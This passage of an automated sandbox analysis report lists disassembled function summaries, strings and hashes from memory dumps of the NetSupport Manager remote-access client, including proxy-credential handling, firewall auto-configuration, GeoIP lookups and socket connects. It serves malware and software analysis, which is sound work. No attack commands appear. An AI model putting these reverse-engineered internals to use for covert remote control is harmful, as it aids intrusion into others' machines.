Setting resource langid=%d, xrefs: 110282D1

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
API String ID: 512045693-419896573
Opcode ID: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
Instruction ID: 7a246749baaa4a6e23861a3fd22e5cd13303056935123195fcb9bb693944541c
Opcode Fuzzy Hash: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
Instruction Fuzzy Hash: B841D678E04229ABD714CF65CCD5FEAB7B9EB44709F0081A5F95897280DA71AE44CBA0

Function 6D1D33A0 Relevance: 27.6, APIs: 2, Strings: 16, Instructions: 571COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 6D1D34FD
wsprintfA.USER32 ref: 6D1D3727

Strings

client247, xrefs: 6D1D362F
%s:%s, xrefs: 6D1D3721
Gateway, xrefs: 6D1D3577
*GatewayAddress, xrefs: 6D1D3430
Gateway_WebProxy, xrefs: 6D1D359D
:%d, xrefs: 6D1D34F7
*UseWebProxy, xrefs: 6D1D343C
PinProxy, xrefs: 6D1D35ED
*PINServer, xrefs: 6D1D35C4
P, xrefs: 6D1D3533
ProxyPassword, xrefs: 6D1D36F7
ProxyUsername, xrefs: 6D1D36E0
ProxyCred, xrefs: 6D1D362A
Gateway_UseWebProxy, xrefs: 6D1D3585
UsePinProxy, xrefs: 6D1D35D0
*WebProxy, xrefs: 6D1D3459

Memory Dump Source

Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true

Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247
API String ID: 2111968516-2157635994
Opcode ID: 6e0c617efeb359e25ef0cb76f7b60eecaad24fb5592b7e70307000e3a7055816
Instruction ID: 09586cd0833cb75d8015f287e26d2e154fd7e1c19906b0d52c2a07e111dfcdee
Opcode Fuzzy Hash: 6e0c617efeb359e25ef0cb76f7b60eecaad24fb5592b7e70307000e3a7055816
Instruction Fuzzy Hash: 6222D1B2A04319ABDB21CF64CC80EFAB3B9AB5A304F0485D9E509A7144DBB55F85CF52

Function 11085E10 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 218libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PCIINV.DLL,461C6054,03347250,03347240,?,00000000,1118276C,000000FF,?,11031942,03347250,00000000,?,?,?), ref: 11085E45

Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477

Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7736C3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E

GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11085E6B
GetProcAddress.KERNEL32(00000000,Cancel), ref: 11085E7F
GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11085E93
wsprintfA.USER32 ref: 11085F1B
wsprintfA.USER32 ref: 11085F32
wsprintfA.USER32 ref: 11085F49
CloseHandle.KERNEL32(00000000,11085C70,00000001,00000000), ref: 1108609A

Part of subcall function 11085A80: CloseHandle.KERNEL32(?,7622F550,?,?,110860C0,?,11031942,03347250,00000000,?,?,?), ref: 11085A98
Part of subcall function 11085A80: CloseHandle.KERNEL32(?,7622F550,?,?,110860C0,?,11031942,03347250,00000000,?,?,?), ref: 11085AAB
Part of subcall function 11085A80: CloseHandle.KERNEL32(?,7622F550,?,?,110860C0,?,11031942,03347250,00000000,?,?,?), ref: 11085ABE
Part of subcall function 11085A80: FreeLibrary.KERNEL32(00000000,7622F550,?,?,110860C0,?,11031942,03347250,00000000,?,?,?), ref: 11085AD1

Strings

GetInventory, xrefs: 11085E65
PCIINV.DLL, xrefs: 11085E40
Cancel, xrefs: 11085E79
%s_HF.%s, xrefs: 11085F43
%s_HW.%s, xrefs: 11085F12
%s_SW.%s, xrefs: 11085F2C
GetInventoryEx, xrefs: 11085E87

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
API String ID: 4263811268-2492245516
Opcode ID: 580252df84bdcdc6499ed92e61105ed699e301d3311ed66a4cfed3cd2d14b9cd
Instruction ID: c264ff3baa83c9e34b1ea5f373b83d9ca187d225ad452563e08076ac2ec7b834
Opcode Fuzzy Hash: 580252df84bdcdc6499ed92e61105ed699e301d3311ed66a4cfed3cd2d14b9cd
Instruction Fuzzy Hash: 40718175E0874AABEB14CF75CC46BDBFBE4AB48304F10452AE956D7280EB71A500CB95

Function 110304B8 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 190synchronizationlibraryloaderCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 110305F3
CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 1103060A
GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 110306AC
SetLastError.KERNEL32(00000078), ref: 110306C2
WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
CloseHandle.KERNEL32(?), ref: 11030709
FreeLibrary.KERNEL32(?), ref: 11030714
CloseHandle.KERNEL32(00000000), ref: 1103071B

Strings

/247, xrefs: 11030616
_debug\trace, xrefs: 11030544
istaUI, xrefs: 1103050D
SOFTWARE\Policies\NetSupport\Client\standard, xrefs: 1103052A
_debug\tracefile, xrefs: 11030556
PCIMutex, xrefs: 110305E3, 11030603
SetProcessDPIAware, xrefs: 110306A6

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
API String ID: 2061479752-1320826866
Opcode ID: 0d39df59e163ec42972c05366f6982142c4fbac670ea150c644f180f6e7f1396
Instruction ID: 4511418fabb8e143c6e2e60e2068ec6a59f08b67eb8208c825473cc9362a61df
Opcode Fuzzy Hash: 0d39df59e163ec42972c05366f6982142c4fbac670ea150c644f180f6e7f1396
Instruction Fuzzy Hash: 72613774E1635AAFEB10DFB09C44B9EB7B4AF8470DF1000A9D919A71C5EF70AA44CB51

Function 11106100 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 153COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 1110612E
EnterCriticalSection.KERNEL32(111F060C), ref: 11106137
GetTickCount.KERNEL32 ref: 1110613D
GetTickCount.KERNEL32 ref: 11106190
LeaveCriticalSection.KERNEL32(111F060C), ref: 11106199
GetTickCount.KERNEL32 ref: 111061CA
LeaveCriticalSection.KERNEL32(111F060C), ref: 111061D3
EnterCriticalSection.KERNEL32(111F060C), ref: 111061FC
LeaveCriticalSection.KERNEL32(111F060C,00000000,?,00000000), ref: 111062C3

Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477

Part of subcall function 110F0CF0: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11106267,?), ref: 110F0D1B

Strings

info. new psi(%d) = %x, xrefs: 111062B1
Warning. took %d ms to get simap lock, xrefs: 11106149
psi, xrefs: 11106183, 11106238, 1110627E
e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp, xrefs: 1110617E, 11106233, 11106279
Warning. simap lock held for %d ms, xrefs: 111061A9, 111061E3

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountTick$Leave$Enter$Initialize_malloc_memsetwsprintf
String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
API String ID: 1574099134-3013461081
Opcode ID: b2b9c5ce670e3531f147c496016740e2bd358faf722e9ad6eefb1db8a03b9692
Instruction ID: 01093d0ef8ba3b8d66a1f5e3f4838d53f0bc1b4d1e9212342b6ef41ebc516d7c
Opcode Fuzzy Hash: b2b9c5ce670e3531f147c496016740e2bd358faf722e9ad6eefb1db8a03b9692
Instruction Fuzzy Hash: 64410E79F0411AABD700DFA59C81E9EFBB9EB8462CF524535F909E7240EA306904CBE1

Function 11133E80 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 101windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11145440: _memset.LIBCMT ref: 11145485
Part of subcall function 11145440: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
Part of subcall function 11145440: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
Part of subcall function 11145440: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
Part of subcall function 11145440: FreeLibrary.KERNEL32(00000000), ref: 111454EF
Part of subcall function 11145440: GetSystemDefaultLangID.KERNEL32 ref: 111454FA

AdjustWindowRectEx.USER32(111417B8,00CE0000,00000001,00000001), ref: 11133EC7
LoadMenuA.USER32(00000000,000003EC), ref: 11133ED8
GetSystemMetrics.USER32(00000021), ref: 11133EE9
GetSystemMetrics.USER32(0000000F), ref: 11133EF1
GetSystemMetrics.USER32(00000004), ref: 11133EF7
GetDC.USER32(00000000), ref: 11133F03
GetDeviceCaps.GDI32(00000000,0000005A), ref: 11133F0E
ReleaseDC.USER32(00000000,00000000), ref: 11133F1A
CreateWindowExA.USER32(00000001,NSMWClass,0316DF08,00CE0000,80000000,80000000,111417B8,?,00000000,?,11000000,00000000), ref: 11133F6F
GetLastError.KERNEL32(?,?,?,?,?,110F7D09,00000001,111417B8,_debug), ref: 11133F77

Strings

Fs, xrefs: 11133F0E
CreateMainWnd, hwnd=%x, e=%d, xrefs: 11133F7F
NSMWClass, xrefs: 11133F69
mainwnd ht1=%d, ht2=%d, yppi=%d, xrefs: 11133F2E

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
String ID: Fs$CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
API String ID: 1594747848-4184434473
Opcode ID: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
Instruction ID: 5297cf036ba1cbd73fc44df567c8a611b910eb11675e7325f2afb4d5e36916b9
Opcode Fuzzy Hash: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
Instruction Fuzzy Hash: C4316275E10219ABDB149FF58C85FAFFBB8EB48709F100529FA25B7284D67469008BA4

Function 1102C410 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 238synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 1110F340: SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364

WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C455
GetTickCount.KERNEL32 ref: 1102C47A

Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A

GetTickCount.KERNEL32 ref: 1102C574

Part of subcall function 110D1370: wvsprintfA.USER32(?,?,1102C511), ref: 110D139B

Part of subcall function 110D07C0: _free.LIBCMT ref: 110D07ED

WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C66C
CloseHandle.KERNEL32(?), ref: 1102C688

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1102C6B9, 1102C6CD, 1102C6E1, 1102C6F5
GetLatLong=%s, took %d ms, xrefs: 1102C591
_debug, xrefs: 1102C4C8, 1102C52A
GeoIP, xrefs: 1102C4C3
http://geo.netsupportsoftware.com/location/loca.asp, xrefs: 1102C495
LatLong, xrefs: 1102C438, 1102C525
?IP=%s, xrefs: 1102C506
IsA(), xrefs: 1102C6BE, 1102C6D2, 1102C6E6, 1102C6FA

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
API String ID: 596640303-1725438197
Opcode ID: a4075b00ae435e862434feb92886abc03d766228ad5fce73a1a3aa23dd3da47f
Instruction ID: 59613557395ae23f7967247d4baf4cae7550bfc3229e85cd4bc92fe2e2f2b4a8
Opcode Fuzzy Hash: a4075b00ae435e862434feb92886abc03d766228ad5fce73a1a3aa23dd3da47f
Instruction Fuzzy Hash: 6B818275E0020AABDF04DBE8CD94FEEF7B5AF59708F504258E82567284DB34BA05CB61

Function 11061700 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106175A

Part of subcall function 11061140: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
Part of subcall function 11061140: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4

RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110617AB
RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11061865
RegCloseKey.ADVAPI32(?), ref: 11061881

Strings

Standard, xrefs: 110617C6
%s\%s\%s\, xrefs: 11061804
Software\Policies\NetSupport\Client, xrefs: 11061754
Software\Policies\NetSupport, xrefs: 110617FF
Client, xrefs: 11061768, 11061898
DisableUserPolicies, xrefs: 11061893
Software\Policies\NetSupport\Client\Standard, xrefs: 1106176D
Client.%04d.%s, xrefs: 110617E7
Client, xrefs: 110617FA

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: Enum$Open$CloseValue
String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
API String ID: 2823542970-1528906934
Opcode ID: 7cc112680d9f38dceee3fd69fc05097985d25d4106bb02746db8af0d702e47c0
Instruction ID: 3a074a016260bf88f68c0586b8c591cabbb012c9b5ad66670ab8b6bf40d046b4
Opcode Fuzzy Hash: 7cc112680d9f38dceee3fd69fc05097985d25d4106bb02746db8af0d702e47c0
Instruction Fuzzy Hash: 5F416179E4022DABD724CB55CC81FEAB7BCEB94748F1001D9EA48A6140D6B06E84CFA1

Function 11137630 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130COMMON

Download Yara Rule

APIs

Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D

GetTickCount.KERNEL32 ref: 11137692

Part of subcall function 11096970: CoInitialize.OLE32(00000000), ref: 11096984
Part of subcall function 11096970: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
Part of subcall function 11096970: CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
Part of subcall function 11096970: CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9

GetTickCount.KERNEL32 ref: 111376A1
_memset.LIBCMT ref: 111376E3
GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 111376F9
_strrchr.LIBCMT ref: 11137708
_free.LIBCMT ref: 1113775A

Strings

IsICFPresent() took %d ms, xrefs: 111376AD
ICFConfig2 returned 0x%x, xrefs: 11137760
IsICFPresent..., xrefs: 1113767F
No ICF present, xrefs: 11137792
Client, xrefs: 1113766C
ICFConfig, xrefs: 11137645
*AutoICFConfig, xrefs: 11137667

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
API String ID: 711243594-1270230032
Opcode ID: 75583d28352384e2cf53e3dfb4376cfa8c34b520fed90423550415c6e03e8050
Instruction ID: 94b21c48fabd249aebac1ca0d473d12a11480cc4bb4ab1ee9f0f9b3b40903c19
Opcode Fuzzy Hash: 75583d28352384e2cf53e3dfb4376cfa8c34b520fed90423550415c6e03e8050
Instruction Fuzzy Hash: 9941AE7AE0022E97C710DF756C89BEFF7699B5471DF040079E90493140EAB1AD44CBE1

Function 6D1C7610 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 111networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WSOCK32 ref: 6D1C7642
connect.WSOCK32(00000000,?,?), ref: 6D1C7659
WSAGetLastError.WSOCK32(00000000,?,?), ref: 6D1C7660
_memmove.LIBCMT ref: 6D1C76D3
